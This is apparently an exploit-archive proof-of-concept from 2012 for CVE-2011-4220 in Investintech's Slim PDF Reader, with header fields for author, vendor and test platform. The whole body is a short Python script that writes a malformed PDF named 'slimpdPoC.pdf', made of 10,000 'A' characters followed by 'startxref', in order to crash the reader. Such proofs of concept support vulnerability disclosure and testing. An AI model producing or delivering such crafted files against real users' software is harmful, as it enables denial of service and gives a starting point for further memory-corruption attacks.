1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
# Exploit Title: # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.investintech.com # Version:1.0 # Tested on: Windows 7 # CVE : cve-2011-4220 payload ="A"*10000 crash="startxref" pdf=payload+crash filename = "slimpdPoC.pdf" file = open(filename,"w") file.writelines(pdf) file.close() |